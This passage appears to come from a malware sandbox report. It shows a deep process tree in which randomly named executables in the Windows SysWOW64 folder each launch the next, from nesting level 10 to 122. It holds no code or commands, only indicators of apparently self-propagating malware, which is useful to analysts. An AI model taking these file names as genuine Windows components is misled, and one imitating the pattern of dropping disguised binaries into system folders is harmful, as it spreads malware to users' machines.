C:\Windows\SysWOW64\Kiancgbi.exeC:\Windows\system32\Kiancgbi.exe10⤵PID:15308
-
C:\Windows\SysWOW64\Kehohh32.exeC:\Windows\system32\Kehohh32.exe11⤵PID:18504
-
C:\Windows\SysWOW64\Kfjhgk32.exeC:\Windows\system32\Kfjhgk32.exe12⤵PID:18628
-
C:\Windows\SysWOW64\Llimeaia.exeC:\Windows\system32\Llimeaia.exe13⤵PID:18700
-
C:\Windows\SysWOW64\Lbebgkol.exeC:\Windows\system32\Lbebgkol.exe14⤵PID:18796
-
C:\Windows\SysWOW64\Lbhomkmi.exeC:\Windows\system32\Lbhomkmi.exe15⤵PID:18860
-
C:\Windows\SysWOW64\Mclhhj32.exeC:\Windows\system32\Mclhhj32.exe16⤵PID:18932
-
C:\Windows\SysWOW64\Mmbmec32.exeC:\Windows\system32\Mmbmec32.exe17⤵PID:18980
-
C:\Windows\SysWOW64\Mgmndh32.exeC:\Windows\system32\Mgmndh32.exe18⤵PID:19076
-
C:\Windows\SysWOW64\Mgokihke.exeC:\Windows\system32\Mgokihke.exe19⤵PID:19132
-
C:\Windows\SysWOW64\Mgagogib.exeC:\Windows\system32\Mgagogib.exe20⤵PID:19252
-
C:\Windows\SysWOW64\Ncjdihld.exeC:\Windows\system32\Ncjdihld.exe21⤵PID:19356
-
C:\Windows\SysWOW64\Ngmgkfoe.exeC:\Windows\system32\Ngmgkfoe.exe22⤵PID:17864
-
C:\Windows\SysWOW64\Onlhbobl.exeC:\Windows\system32\Onlhbobl.exe23⤵PID:18488
-
C:\Windows\SysWOW64\Onqbno32.exeC:\Windows\system32\Onqbno32.exe24⤵PID:18668
-
C:\Windows\SysWOW64\Pmhldk32.exeC:\Windows\system32\Pmhldk32.exe25⤵PID:18808
-
C:\Windows\SysWOW64\Pgnpacpb.exeC:\Windows\system32\Pgnpacpb.exe26⤵PID:18912
-
C:\Windows\SysWOW64\Pdapkgol.exeC:\Windows\system32\Pdapkgol.exe27⤵PID:2928
-
C:\Windows\SysWOW64\Pmoaei32.exeC:\Windows\system32\Pmoaei32.exe28⤵PID:19140
-
C:\Windows\SysWOW64\Qfgfnoae.exeC:\Windows\system32\Qfgfnoae.exe29⤵PID:19232
-
C:\Windows\SysWOW64\Qdhfkf32.exeC:\Windows\system32\Qdhfkf32.exe30⤵PID:17512
-
C:\Windows\SysWOW64\Aflpio32.exeC:\Windows\system32\Aflpio32.exe31⤵PID:19404
-
C:\Windows\SysWOW64\Anedpklo.exeC:\Windows\system32\Anedpklo.exe32⤵PID:18348
-
C:\Windows\SysWOW64\Aqfmafip.exeC:\Windows\system32\Aqfmafip.exe33⤵PID:18600
-
C:\Windows\SysWOW64\Amoklgla.exeC:\Windows\system32\Amoklgla.exe34⤵PID:18824
-
C:\Windows\SysWOW64\Bgjhdo32.exeC:\Windows\system32\Bgjhdo32.exe35⤵PID:18276
-
C:\Windows\SysWOW64\Cebbhc32.exeC:\Windows\system32\Cebbhc32.exe36⤵PID:19376
-
C:\Windows\SysWOW64\Cakpccfh.exeC:\Windows\system32\Cakpccfh.exe37⤵PID:18648
-
C:\Windows\SysWOW64\Cmgjcd32.exeC:\Windows\system32\Cmgjcd32.exe38⤵PID:14060
-
C:\Windows\SysWOW64\Dhlnqm32.exeC:\Windows\system32\Dhlnqm32.exe39⤵PID:19412
-
C:\Windows\SysWOW64\Ehjjbkkm.exeC:\Windows\system32\Ehjjbkkm.exe40⤵PID:18676
-
C:\Windows\SysWOW64\Eenkkojf.exeC:\Windows\system32\Eenkkojf.exe41⤵PID:19496
-
C:\Windows\SysWOW64\Edfdbkml.exeC:\Windows\system32\Edfdbkml.exe42⤵PID:19612
-
C:\Windows\SysWOW64\Fnqeppaj.exeC:\Windows\system32\Fnqeppaj.exe43⤵PID:19728
-
C:\Windows\SysWOW64\Fhkcih32.exeC:\Windows\system32\Fhkcih32.exe44⤵PID:19896
-
C:\Windows\SysWOW64\Ghbiiggb.exeC:\Windows\system32\Ghbiiggb.exe45⤵PID:20112
-
C:\Windows\SysWOW64\Gfhfhk32.exeC:\Windows\system32\Gfhfhk32.exe46⤵PID:20264
-
C:\Windows\SysWOW64\Ghiojfaj.exeC:\Windows\system32\Ghiojfaj.exe47⤵PID:20456
-
C:\Windows\SysWOW64\Hddijgbi.exeC:\Windows\system32\Hddijgbi.exe48⤵PID:19528
-
C:\Windows\SysWOW64\Hffbjihi.exeC:\Windows\system32\Hffbjihi.exe49⤵PID:1344
-
C:\Windows\SysWOW64\Ifhooi32.exeC:\Windows\system32\Ifhooi32.exe50⤵PID:19792
-
C:\Windows\SysWOW64\Ibamjjih.exeC:\Windows\system32\Ibamjjih.exe51⤵PID:19980
-
C:\Windows\SysWOW64\Jfflqg32.exeC:\Windows\system32\Jfflqg32.exe52⤵PID:20568
-
C:\Windows\SysWOW64\Lndfag32.exeC:\Windows\system32\Lndfag32.exe53⤵PID:21796
-
C:\Windows\SysWOW64\Nifcak32.exeC:\Windows\system32\Nifcak32.exe54⤵PID:19964
-
C:\Windows\SysWOW64\Phqbde32.exeC:\Windows\system32\Phqbde32.exe55⤵PID:23304
-
C:\Windows\SysWOW64\Aqcjaq32.exeC:\Windows\system32\Aqcjaq32.exe56⤵PID:23404
-
C:\Windows\SysWOW64\Bihalalg.exeC:\Windows\system32\Bihalalg.exe57⤵PID:22208
-
C:\Windows\SysWOW64\Bcpbojjk.exeC:\Windows\system32\Bcpbojjk.exe58⤵PID:22260
-
C:\Windows\SysWOW64\Bfqkpe32.exeC:\Windows\system32\Bfqkpe32.exe59⤵PID:22344
-
C:\Windows\SysWOW64\Cpkloj32.exeC:\Windows\system32\Cpkloj32.exe60⤵PID:22448
-
C:\Windows\SysWOW64\Cakiimcl.exeC:\Windows\system32\Cakiimcl.exe61⤵PID:22508
-
C:\Windows\SysWOW64\Dmfcindk.exeC:\Windows\system32\Dmfcindk.exe62⤵PID:20408
-
C:\Windows\SysWOW64\Diamin32.exeC:\Windows\system32\Diamin32.exe63⤵PID:21372
-
C:\Windows\SysWOW64\Ddinlf32.exeC:\Windows\system32\Ddinlf32.exe64⤵PID:20076
-
C:\Windows\SysWOW64\Eikpom32.exeC:\Windows\system32\Eikpom32.exe65⤵PID:20704
-
C:\Windows\SysWOW64\Ehlpmdfo.exeC:\Windows\system32\Ehlpmdfo.exe66⤵PID:20900
-
C:\Windows\SysWOW64\Fibfplhg.exeC:\Windows\system32\Fibfplhg.exe67⤵PID:20980
-
C:\Windows\SysWOW64\Fmbkkjlk.exeC:\Windows\system32\Fmbkkjlk.exe68⤵PID:21128
-
C:\Windows\SysWOW64\Ginekjnj.exeC:\Windows\system32\Ginekjnj.exe69⤵PID:21420
-
C:\Windows\SysWOW64\Gipbaj32.exeC:\Windows\system32\Gipbaj32.exe70⤵PID:19884
-
C:\Windows\SysWOW64\Hdmloaee.exeC:\Windows\system32\Hdmloaee.exe71⤵PID:20896
-
C:\Windows\SysWOW64\Haefcepj.exeC:\Windows\system32\Haefcepj.exe72⤵PID:21664
-
C:\Windows\SysWOW64\Hjchmg32.exeC:\Windows\system32\Hjchmg32.exe73⤵PID:21752
-
C:\Windows\SysWOW64\Ikbdgjbe.exeC:\Windows\system32\Ikbdgjbe.exe74⤵PID:21836
-
C:\Windows\SysWOW64\Ijgahf32.exeC:\Windows\system32\Ijgahf32.exe75⤵PID:21956
-
C:\Windows\SysWOW64\Ihmkamkf.exeC:\Windows\system32\Ihmkamkf.exe76⤵PID:21408
-
C:\Windows\SysWOW64\Jhdabl32.exeC:\Windows\system32\Jhdabl32.exe77⤵PID:22640
-
C:\Windows\SysWOW64\Jginci32.exeC:\Windows\system32\Jginci32.exe78⤵PID:22724
-
C:\Windows\SysWOW64\Jglkih32.exeC:\Windows\system32\Jglkih32.exe79⤵PID:22852
-
C:\Windows\SysWOW64\Keddmlbh.exeC:\Windows\system32\Keddmlbh.exe80⤵PID:22912
-
C:\Windows\SysWOW64\Kanbhlfj.exeC:\Windows\system32\Kanbhlfj.exe81⤵PID:23060
-
C:\Windows\SysWOW64\Llhppd32.exeC:\Windows\system32\Llhppd32.exe82⤵PID:22900
-
C:\Windows\SysWOW64\Lilpjiad.exeC:\Windows\system32\Lilpjiad.exe83⤵PID:23356
-
C:\Windows\SysWOW64\Mnbkhngq.exeC:\Windows\system32\Mnbkhngq.exe84⤵PID:22336
-
C:\Windows\SysWOW64\Mndhnnen.exeC:\Windows\system32\Mndhnnen.exe85⤵PID:22432
-
C:\Windows\SysWOW64\Nloohanp.exeC:\Windows\system32\Nloohanp.exe86⤵PID:20088
-
C:\Windows\SysWOW64\Oihhle32.exeC:\Windows\system32\Oihhle32.exe87⤵PID:20656
-
C:\Windows\SysWOW64\Oiakbc32.exeC:\Windows\system32\Oiakbc32.exe88⤵PID:20904
-
C:\Windows\SysWOW64\Pemebdbh.exeC:\Windows\system32\Pemebdbh.exe89⤵PID:21164
-
C:\Windows\SysWOW64\Plkgjmep.exeC:\Windows\system32\Plkgjmep.exe90⤵PID:21396
-
C:\Windows\SysWOW64\Aehenbhk.exeC:\Windows\system32\Aehenbhk.exe91⤵PID:21564
-
C:\Windows\SysWOW64\Ahkkem32.exeC:\Windows\system32\Ahkkem32.exe92⤵PID:21592
-
C:\Windows\SysWOW64\Aojlmf32.exeC:\Windows\system32\Aojlmf32.exe93⤵PID:21776
-
C:\Windows\SysWOW64\Bffapp32.exeC:\Windows\system32\Bffapp32.exe94⤵PID:21976
-
C:\Windows\SysWOW64\Boabnepi.exeC:\Windows\system32\Boabnepi.exe95⤵PID:22628
-
C:\Windows\SysWOW64\Ckoice32.exeC:\Windows\system32\Ckoice32.exe96⤵PID:22948
-
C:\Windows\SysWOW64\Doakecbf.exeC:\Windows\system32\Doakecbf.exe97⤵PID:23052
-
C:\Windows\SysWOW64\Dfpmmmem.exeC:\Windows\system32\Dfpmmmem.exe98⤵PID:11276
-
C:\Windows\SysWOW64\Fpijlpnk.exeC:\Windows\system32\Fpijlpnk.exe99⤵PID:19576
-
C:\Windows\SysWOW64\Fdlmnn32.exeC:\Windows\system32\Fdlmnn32.exe100⤵PID:22660
-
C:\Windows\SysWOW64\Ffleoi32.exeC:\Windows\system32\Ffleoi32.exe101⤵PID:21180
-
C:\Windows\SysWOW64\Gmijab32.exeC:\Windows\system32\Gmijab32.exe102⤵PID:21500
-
C:\Windows\SysWOW64\Gdepdl32.exeC:\Windows\system32\Gdepdl32.exe103⤵PID:20860
-
C:\Windows\SysWOW64\Gibhlc32.exeC:\Windows\system32\Gibhlc32.exe104⤵PID:21660
-
C:\Windows\SysWOW64\Hlencnag.exeC:\Windows\system32\Hlencnag.exe105⤵PID:16764
-
C:\Windows\SysWOW64\Hllddm32.exeC:\Windows\system32\Hllddm32.exe106⤵PID:23096
-
C:\Windows\SysWOW64\Icoogeja.exeC:\Windows\system32\Icoogeja.exe107⤵PID:22304
-
C:\Windows\SysWOW64\Jcfegddj.exeC:\Windows\system32\Jcfegddj.exe108⤵PID:20296
-
C:\Windows\SysWOW64\Jnnfjm32.exeC:\Windows\system32\Jnnfjm32.exe109⤵PID:20680
-
C:\Windows\SysWOW64\Jcmkhc32.exeC:\Windows\system32\Jcmkhc32.exe110⤵PID:21388
-
C:\Windows\SysWOW64\Kcgnnb32.exeC:\Windows\system32\Kcgnnb32.exe111⤵PID:18840
-
C:\Windows\SysWOW64\Kqmkmfbn.exeC:\Windows\system32\Kqmkmfbn.exe112⤵PID:22000
-
C:\Windows\SysWOW64\Lgippphh.exeC:\Windows\system32\Lgippphh.exe113⤵PID:22532
-
C:\Windows\SysWOW64\Lmkbcf32.exeC:\Windows\system32\Lmkbcf32.exe114⤵PID:22964
-
C:\Windows\SysWOW64\Mjfhmikl.exeC:\Windows\system32\Mjfhmikl.exe115⤵PID:22520
-
C:\Windows\SysWOW64\Nmkkjddg.exeC:\Windows\system32\Nmkkjddg.exe116⤵PID:17812
-
C:\Windows\SysWOW64\Nakpebhk.exeC:\Windows\system32\Nakpebhk.exe117⤵PID:20812
-
C:\Windows\SysWOW64\Oapjqa32.exeC:\Windows\system32\Oapjqa32.exe118⤵PID:21416
-
C:\Windows\SysWOW64\Oaeclqpq.exeC:\Windows\system32\Oaeclqpq.exe119⤵PID:18628
-
C:\Windows\SysWOW64\Oaimgp32.exeC:\Windows\system32\Oaimgp32.exe120⤵PID:23472
-
C:\Windows\SysWOW64\Pogpfc32.exeC:\Windows\system32\Pogpfc32.exe121⤵PID:18984
-
C:\Windows\SysWOW64\Pdchoj32.exeC:\Windows\system32\Pdchoj32.exe122⤵PID:18948
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-